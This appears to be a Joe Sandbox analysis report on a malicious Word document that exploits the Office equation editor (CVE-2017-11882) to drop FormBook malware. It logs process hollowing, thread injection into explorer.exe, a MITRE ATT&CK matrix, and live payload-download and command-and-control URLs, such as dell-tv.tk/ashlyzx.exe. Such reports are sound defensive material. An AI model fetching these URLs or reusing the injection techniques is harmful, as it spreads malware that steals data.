          Source: C:\Windows\explorer.exeNetwork Connect: 172.67.184.102 80
          Source: C:\Windows\explorer.exeDomain query: www.volunteervabetweenk.com
          Source: C:\Windows\explorer.exeDomain query: www.1oavyx.com
          Source: C:\Windows\explorer.exeNetwork Connect: 34.102.136.180 80
          Sample uses process hollowing techniqueShow sources
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exeSection unmapped: C:\Windows\SysWOW64\cmstp.exe base address: 110000
          Maps a DLL or memory area into another processShow sources
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exeSection loaded: unknown target: C:\Windows\SysWOW64\cmstp.exe protection: execute and read and write
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exeSection loaded: unknown target: C:\Windows\SysWOW64\cmstp.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\cmstp.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read write
          Source: C:\Windows\SysWOW64\cmstp.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Injects a PE file into a foreign processesShow sources
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exeMemory written: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe base: 400000 value starts with: 4D5A
          Queues an APC in another process (thread injection)Show sources
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exeThread APC queued: target process: C:\Windows\explorer.exe
          Modifies the context of a thread in another process (thread injection)Show sources
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exeThread register set: target process: 1764
          Source: C:\Windows\SysWOW64\cmstp.exeThread register set: target process: 1764
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe C:\Users\user\AppData\Roaming\ashlkyvc7592.exe
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exeProcess created: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe C:\Users\user\AppData\Roaming\ashlkyvc7592.exe
          Source: C:\Windows\SysWOW64\cmstp.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\AppData\Roaming\ashlkyvc7592.exe"
          Source: explorer.exe, 00000006.00000000.427630812.0000000000750000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.447568102.0000000000750000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.511801365.0000000000750000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.439598831.0000000000750000.00000002.00020000.sdmp, cmstp.exe, 00000007.00000002.686590550.0000000000A60000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000006.00000000.427421343.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.447366973.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.439424589.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.511482997.0000000000255000.00000004.00000020.sdmpBinary or memory string: ProgmanG
          Source: explorer.exe, 00000006.00000000.427630812.0000000000750000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.447568102.0000000000750000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.511801365.0000000000750000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.439598831.0000000000750000.00000002.00020000.sdmp, cmstp.exe, 00000007.00000002.686590550.0000000000A60000.00000002.00020000.sdmpBinary or memory string: !Progman
          Source: explorer.exe, 00000006.00000000.427630812.0000000000750000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.447568102.0000000000750000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.511801365.0000000000750000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.439598831.0000000000750000.00000002.00020000.sdmp, cmstp.exe, 00000007.00000002.686590550.0000000000A60000.00000002.00020000.sdmpBinary or memory string: Program Manager<
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exeQueries volume information: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe VolumeInformation
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

          Stealing of Sensitive Information:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 5.0.ashlkyvc7592.exe.400000.8.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.0.ashlkyvc7592.exe.400000.10.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.ashlkyvc7592.exe.33ebb40.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.ashlkyvc7592.exe.3393520.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.0.ashlkyvc7592.exe.400000.10.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.0.ashlkyvc7592.exe.400000.8.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.2.ashlkyvc7592.exe.400000.2.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.2.ashlkyvc7592.exe.400000.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.0.ashlkyvc7592.exe.400000.6.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000007.00000002.686456820.0000000000320000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.686315471.00000000001A0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000000.453524985.0000000009369000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000000.423949680.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.686259720.0000000000090000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.461715282.0000000000360000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.461785440.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000000.423661966.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000000.446630168.0000000009369000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.461694176.0000000000310000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.425827877.0000000003249000.00000004.00000001.sdmp, type: MEMORY

          Remote Access Functionality:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 5.0.ashlkyvc7592.exe.400000.8.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.0.ashlkyvc7592.exe.400000.10.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.ashlkyvc7592.exe.33ebb40.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.ashlkyvc7592.exe.3393520.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.0.ashlkyvc7592.exe.400000.10.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.0.ashlkyvc7592.exe.400000.8.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.2.ashlkyvc7592.exe.400000.2.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.2.ashlkyvc7592.exe.400000.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.0.ashlkyvc7592.exe.400000.6.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000007.00000002.686456820.0000000000320000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.686315471.00000000001A0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000000.453524985.0000000009369000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000000.423949680.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.686259720.0000000000090000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.461715282.0000000000360000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.461785440.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000000.423661966.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000000.446630168.0000000009369000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.461694176.0000000000310000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.425827877.0000000003249000.00000004.00000001.sdmp, type: MEMORY

          Mitre Att&ck Matrix

          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid AccountsShared Modules1Path InterceptionProcess Injection612Masquerading1OS Credential DumpingSecurity Software Discovery221Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
          Default AccountsExploitation for Client Execution13Boot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsDisable or Modify Tools1LSASS MemoryProcess Discovery2Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothIngress Tool Transfer14Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Virtualization/Sandbox Evasion31Security Account ManagerVirtualization/Sandbox Evasion31SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol3Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Process Injection612NTDSRemote System Discovery1Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol123SIM Card SwapCarrier Billing Fraud
          Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptDeobfuscate/Decode Files or Information1LSA SecretsFile and Directory Discovery1SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable MediaLaunchdRc.commonRc.commonObfuscated Files or Information4Cached Domain CredentialsSystem Information Discovery113VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
          External Remote ServicesScheduled TaskStartup ItemsStartup ItemsSoftware Packing13DCSyncNetwork SniffingWindows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 signatures2 2 Behavior Graph ID: 528734 Sample: P.O-5433ERE.doc Startdate: 25/11/2021 Architecture: WINDOWS Score: 100 50 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->50 52 Found malware configuration 2->52 54 Malicious sample detected (through community Yara rule) 2->54 56 12 other signatures 2->56 10 EQNEDT32.EXE 11 2->10         started        15 WINWORD.EXE 291 19 2->15         started        process3 dnsIp4 44 dell-tv.tk 37.0.9.166, 49165, 80 WKD-ASIE Netherlands 10->44 32 C:\Users\user\AppData\...\ashlkyvc7592.exe, PE32 10->32 dropped 34 C:\Users\user\AppData\...\ashlyzx[1].exe, PE32 10->34 dropped 74 Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802) 10->74 17 ashlkyvc7592.exe 10->17         started        36 ~WRF{3D999299-2169...1-6FEE86AD4ADA}.tmp, Composite 15->36 dropped file5 signatures6 process7 signatures8 46 Tries to detect virtualization through RDTSC time measurements 17->46 48 Injects a PE file into a foreign processes 17->48 20 ashlkyvc7592.exe 17->20         started        process9 signatures10 58 Modifies the context of a thread in another process (thread injection) 20->58 60 Maps a DLL or memory area into another process 20->60 62 Sample uses process hollowing technique 20->62 64 Queues an APC in another process (thread injection) 20->64 23 explorer.exe 20->23 injected process11 dnsIp12 38 www.texaszephyr.com 23->38 40 www.volunteervabetweenk.com 172.67.184.102, 49169, 80 CLOUDFLARENETUS United States 23->40 42 6 other IPs or domains 23->42 66 System process connects to network (likely due to code injection or exploit) 23->66 27 cmstp.exe 23->27         started        signatures13 process14 signatures15 68 Modifies the context of a thread in another process (thread injection) 27->68 70 Maps a DLL or memory area into another process 27->70 72 Tries to detect virtualization through RDTSC time measurements 27->72 30 cmd.exe 27->30         started        process16

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.

          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          No Antivirus matches

          Dropped Files

          SourceDetectionScannerLabelLink
          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{3D999299-2169-4632-82B1-6FEE86AD4ADA}.tmp100%AviraEXP/CVE-2017-11882.Gen
          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{3D999299-2169-4632-82B1-6FEE86AD4ADA}.tmp100%Joe Sandbox ML

          Unpacked PE Files

          SourceDetectionScannerLabelLinkDownload
          5.0.ashlkyvc7592.exe.400000.10.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          5.0.ashlkyvc7592.exe.400000.8.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          5.2.ashlkyvc7592.exe.400000.2.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          5.0.ashlkyvc7592.exe.400000.6.unpack100%AviraTR/Crypt.ZPACK.GenDownload File

          Domains

          SourceDetectionScannerLabelLink
          texaszephyr.com0%VirustotalBrowse

          URLs

          SourceDetectionScannerLabelLink
          http://wellformedweb.org/CommentAPI/0%URL Reputationsafe
          http://www.texaszephyr.com/op9t/?0l=exlpTNNXh0F&c0=4uZm8lPh56XAYP0u1p0c6SVxcutgTZuNbzhe7MVeNR3LwnMhhkFBXHHvU8jy6jgZH7Gcyg==0%Avira URL Cloudsafe
          http://www.iis.fhg.de/audioPA0%URL Reputationsafe
          http://www.volunteervabetweenk.com/op9t/?0l=exlpTNNXh0F&c0=WMWbw9/24XbwIiPl+aU7TY/mYt55hlmFa8WJlEktQGdJQVklk58s/CKKr8Th7+7tz7UKpw==0%Avira URL Cloudsafe
          http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe
          http://treyresearch.net0%URL Reputationsafe
          http://www.publicfigure.skin/op9t/?c0=RQ8pabDbnEWS4MHppDnLpAnnVm0R7EKmWqTB7JHuP07woLOWNs0JhuHKNBpScYVLrEmjjw==&0l=exlpTNNXh0F0%Avira URL Cloudsafe
          http://java.sun.com0%URL Reputationsafe
          http://www.icra.org/vocabulary/.0%URL Reputationsafe
          http://dell-tv.tk/ashlyzx.exe0%Avira URL Cloudsafe
          http://computername/printers/printername/.printer0%Avira URL Cloudsafe
          http://www.%s.comPA0%URL Reputationsafe
          http://servername/isapibackend.dll0%Avira URL Cloudsafe
          www.fcusd4.com/op9t/0%Avira URL Cloudsafe

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          dell-tv.tk
          		37.0.9.166
          		truetrue
            		unknown
            publicfigure.skin
            		34.102.136.180
            		truefalse
              		unknown
              www.volunteervabetweenk.com
              		172.67.184.102
              		truetrue
                		unknown
                texaszephyr.com
                		34.102.136.180
                		truefalseunknown
                www.texaszephyr.com
                		unknown
                		unknowntrue
                  		unknown
                  www.1oavyx.com
                  		unknown
                  		unknowntrue
                    		unknown
                    www.bandhancustomer.com
                    		unknown
                    		unknowntrue
                      		unknown
                      www.publicfigure.skin
                      		unknown
                      		unknowntrue
                        		unknown

                        Contacted URLs

                        NameMaliciousAntivirus DetectionReputation
                        http://www.texaszephyr.com/op9t/?0l=exlpTNNXh0F&c0=4uZm8lPh56XAYP0u1p0c6SVxcutgTZuNbzhe7MVeNR3LwnMhhkFBXHHvU8jy6jgZH7Gcyg==false
                        • Avira URL Cloud: safe
                        		unknown
                        http://www.volunteervabetweenk.com/op9t/?0l=exlpTNNXh0F&c0=WMWbw9/24XbwIiPl+aU7TY/mYt55hlmFa8WJlEktQGdJQVklk58s/CKKr8Th7+7tz7UKpw==true
                        • Avira URL Cloud: safe
                        		unknown
                        http://www.publicfigure.skin/op9t/?c0=RQ8pabDbnEWS4MHppDnLpAnnVm0R7EKmWqTB7JHuP07woLOWNs0JhuHKNBpScYVLrEmjjw==&0l=exlpTNNXh0Ffalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://dell-tv.tk/ashlyzx.exetrue
                        • Avira URL Cloud: safe
                        		unknown
                        www.fcusd4.com/op9t/true
                        • Avira URL Cloud: safe
                        		low

                        URLs from Memory and Binaries

                        NameSourceMaliciousAntivirus DetectionReputation
                        http://www.windows.com/pctv.explorer.exe, 00000006.00000000.441136797.0000000002AE0000.00000002.00020000.sdmpfalse
                          		high
                          http://investor.msn.comexplorer.exe, 00000006.00000000.441136797.0000000002AE0000.00000002.00020000.sdmpfalse
                            		high
                            http://www.msnbc.com/news/ticker.txtexplorer.exe, 00000006.00000000.441136797.0000000002AE0000.00000002.00020000.sdmpfalse
                              		high
                              http://wellformedweb.org/CommentAPI/explorer.exe, 00000006.00000000.516217936.0000000004650000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.451173882.0000000004650000.00000002.00020000.sdmpfalse
                              • URL Reputation: safe
                              		unknown
                              https://contextual.media.net/medianet.php?cid=8CUT39MWR&crid=715624197&size=306x271&https=1explorer.exe, 00000006.00000000.452882159.00000000083C9000.00000004.00000001.sdmpfalse
                                		high
                                http://www.iis.fhg.de/audioPAexplorer.exe, 00000006.00000000.451173882.0000000004650000.00000002.00020000.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                https://contextual.media.net/medianet.php?cid=8CUT39MWR&crid=715624197&size=306x271&https=1LMEMexplorer.exe, 00000006.00000000.451072374.00000000045D6000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.516156334.00000000045D6000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.443806201.00000000045D6000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.433262826.00000000045D6000.00000004.00000001.sdmpfalse
                                  		high
                                  http://windowsmedia.com/redir/services.asp?WMPFriendly=trueexplorer.exe, 00000006.00000000.512665035.0000000002CC7000.00000002.00020000.sdmpfalse
                                  • URL Reputation: safe
                                  		unknown
                                  http://www.hotmail.com/oeexplorer.exe, 00000006.00000000.441136797.0000000002AE0000.00000002.00020000.sdmpfalse
                                    		high
                                    http://treyresearch.netexplorer.exe, 00000006.00000000.516217936.0000000004650000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.451173882.0000000004650000.00000002.00020000.sdmpfalse
                                    • URL Reputation: safe
                                    		unknown
                                    https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBSKZM1Y&prvid=77%2explorer.exe, 00000006.00000000.442612766.0000000003DF8000.00000004.00000001.sdmpfalse
                                      		high
                                      http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Checkexplorer.exe, 00000006.00000000.512665035.0000000002CC7000.00000002.00020000.sdmpfalse
                                        		high
                                        http://java.sun.comexplorer.exe, 00000006.00000000.427421343.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.447366973.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.439424589.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.511482997.0000000000255000.00000004.00000020.sdmpfalse
                                        • URL Reputation: safe
                                        		unknown
                                        http://www.icra.org/vocabulary/.explorer.exe, 00000006.00000000.512665035.0000000002CC7000.00000002.00020000.sdmpfalse
                                        • URL Reputation: safe
                                        		unknown
                                        http://www.msn.com/de-de/?ocid=iehpCexplorer.exe, 00000006.00000000.450689751.000000000449C000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.514669026.000000000449C000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.432749870.000000000449C000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.443479778.000000000449C000.00000004.00000001.sdmpfalse
                                          		high
                                          http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.explorer.exe, 00000006.00000000.439681149.0000000001BE0000.00000002.00020000.sdmpfalse
                                            		high
                                            http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanervexplorer.exe, 00000006.00000000.450661443.000000000447A000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.438489061.000000000845A000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.446213289.0000000008426000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.432704474.000000000447A000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.515608032.0000000004513000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.438411780.00000000083C9000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.443456223.000000000447A000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.452882159.00000000083C9000.00000004.00000001.sdmpfalse
                                              		high
                                              http://investor.msn.com/explorer.exe, 00000006.00000000.441136797.0000000002AE0000.00000002.00020000.sdmpfalse
                                                		high
                                                http://www.msn.com/?ocid=iehpexplorer.exe, 00000006.00000000.450689751.000000000449C000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.514669026.000000000449C000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.432749870.000000000449C000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.443479778.000000000449C000.00000004.00000001.sdmpfalse
                                                  		high
                                                  http://www.msn.com/de-de/?ocid=iehpexplorer.exe, 00000006.00000000.450689751.000000000449C000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.514669026.000000000449C000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.432749870.000000000449C000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.443479778.000000000449C000.00000004.00000001.sdmpfalse
                                                    		high
                                                    http://www.piriform.com/ccleanerexplorer.exe, 00000006.00000000.450661443.000000000447A000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.438489061.000000000845A000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.443564000.0000000004513000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.446213289.0000000008426000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.432704474.000000000447A000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.450764826.0000000004513000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.432948850.0000000004513000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.515608032.0000000004513000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.438411780.00000000083C9000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.443456223.000000000447A000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.452882159.00000000083C9000.00000004.00000001.sdmpfalse
                                                      		high
                                                      http://computername/printers/printername/.printerexplorer.exe, 00000006.00000000.451173882.0000000004650000.00000002.00020000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      		low
                                                      http://www.%s.comPAexplorer.exe, 00000006.00000000.439681149.0000000001BE0000.00000002.00020000.sdmpfalse
                                                      • URL Reputation: safe
                                                      		low
                                                      http://www.autoitscript.com/autoit3explorer.exe, 00000006.00000000.427421343.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.447366973.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.439424589.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.511482997.0000000000255000.00000004.00000020.sdmpfalse
                                                        		high
                                                        https://support.mozilla.orgexplorer.exe, 00000006.00000000.427421343.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.447366973.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.439424589.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.511482997.0000000000255000.00000004.00000020.sdmpfalse
                                                          		high
                                                          http://www.msn.com/?ocid=iehp0explorer.exe, 00000006.00000000.450689751.000000000449C000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.514669026.000000000449C000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.432749870.000000000449C000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.443479778.000000000449C000.00000004.00000001.sdmpfalse
                                                            		high
                                                            http://servername/isapibackend.dllexplorer.exe, 00000006.00000000.442701106.0000000003E50000.00000002.00020000.sdmp, cmd.exe, 00000008.00000002.466348639.0000000001BD0000.00000002.00020000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            		low

                                                            Contacted IPs

                                                            • No. of IPs < 25%
                                                            • 25% < No. of IPs < 50%
                                                            • 50% < No. of IPs < 75%
                                                            • 75% < No. of IPs

                                                            Public

                                                            IPDomainCountryFlagASNASN NameMalicious
                                                            172.67.184.102
                                                            		www.volunteervabetweenk.comUnited States
                                                            		13335CLOUDFLARENETUStrue
                                                            34.102.136.180
                                                            		publicfigure.skinUnited States
                                                            		15169GOOGLEUSfalse
                                                            37.0.9.166
                                                            		dell-tv.tkNetherlands
                                                            		198301WKD-ASIEtrue

                                                            Private

                                                            IP
                                                            192.168.2.255

                                                            General Information

                                                            Joe Sandbox Version:34.0.0 Boulder Opal
                                                            Analysis ID:528734
                                                            Start date:25.11.2021
                                                            Start time:18:07:48
                                                            Joe Sandbox Product:CloudBasic
                                                            Overall analysis duration:0h 10m 58s
                                                            Hypervisor based Inspection enabled:false
                                                            Report type:light
                                                            Sample file name:P.O-5433ERE.doc
                                                            Cookbook file name:defaultwindowsofficecookbook.jbs
                                                            Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                                                            Number of analysed new started processes analysed:11
                                                            Number of new started drivers analysed:0
                                                            Number of existing processes analysed:0
                                                            Number of existing drivers analysed:0
                                                            Number of injected processes analysed:1
                                                            Technologies:
                                                            • HCA enabled
                                                            • EGA enabled
                                                            • HDC enabled
                                                            • AMSI enabled
                                                            Analysis Mode:default
                                                            Analysis stop reason:Timeout
                                                            Detection:MAL
                                                            Classification:mal100.troj.expl.evad.winDOC@9/9@6/4
                                                            EGA Information:Failed
                                                            HDC Information:
                                                            • Successful, ratio: 22.5% (good quality ratio 21%)
                                                            • Quality average: 74.3%
                                                            • Quality standard deviation: 29.9%
                                                            HCA Information:
                                                            • Successful, ratio: 91%
                                                            • Number of executed functions: 0
                                                            • Number of non-executed functions: 0
                                                            Cookbook Comments:
                                                            • Adjust boot time
                                                            • Enable AMSI
                                                            • Found application associated with file extension: .doc
                                                            • Found Word or Excel or PowerPoint or XPS Viewer
                                                            • Attach to Office via COM
                                                            • Scroll down
                                                            • Close Viewer
                                                            Warnings:
                                                            Show All
                                                            • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, conhost.exe, svchost.exe
                                                            • TCP Packets have been reduced to 100
                                                            • Excluded IPs from analysis (whitelisted): 144.91.75.9
                                                            • Excluded domains from analysis (whitelisted): sevensummitclimbing.com, www.sevensummitclimbing.com
                                                            • Not all processes where analyzed, report is missing behavior information
                                                            • Report size getting too big, too many NtQueryAttributesFile calls found.

                                                            Simulations

                                                            Behavior and APIs

                                                            TimeTypeDescription
                                                            18:08:17API Interceptor179x Sleep call for process: EQNEDT32.EXE modified
                                                            18:08:24API Interceptor55x Sleep call for process: ashlkyvc7592.exe modified
                                                            18:08:45API Interceptor95x Sleep call for process: cmstp.exe modified
                                                            18:10:00API Interceptor1x Sleep call for process: explorer.exe modified

                                                            Joe Sandbox View / Context

                                                            IPs

                                                            MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                            37.0.9.166Quotation No. Q07387.docGet hashmaliciousBrowse
                                                            • dell-tv.tk/templezx.exe
                                                            Swift Copy TT.docGet hashmaliciousBrowse
                                                            • dell-tv.tk/xzx.exe
                                                            Order ID 1426095239.docGet hashmaliciousBrowse
                                                            • kizitox.ga/mazx.exe
                                                            PAYMENT2021A0087NOV.docGet hashmaliciousBrowse
                                                            • kizitox.ga/chriszx.exe
                                                            Temp Order2.exeGet hashmaliciousBrowse
                                                            • drossmnfg.com/stallion/index.php
                                                            Rev_NN doccument.docGet hashmaliciousBrowse
                                                            • samsung-tv.tk/hussanzx.exe
                                                            20211122.docGet hashmaliciousBrowse
                                                            • samsung-tv.tk/famzx.exe
                                                            PO-20212222.docGet hashmaliciousBrowse
                                                            • samsung-tv.tk/obizx.exe
                                                            BANK DETAILS.docGet hashmaliciousBrowse
                                                            • kizitox.ga/mazx.exe
                                                            50% TT advance copy.docGet hashmaliciousBrowse
                                                            • kizitox.ga/ugopoundzx.exe
                                                            Drawing-FS3589_Surra-Unprice BOQ - Lock file - 28.1.2021.xlsx 788K.docGet hashmaliciousBrowse
                                                            • kizitox.ga/mpomzx.exe
                                                            PURCHASE ORDER.docGet hashmaliciousBrowse
                                                            • kizitox.ga/chriszx.exe
                                                            DHL AWB TRACKING DETAILS.docGet hashmaliciousBrowse
                                                            • kizitox.ga/okeyzx.exe
                                                            items.docGet hashmaliciousBrowse
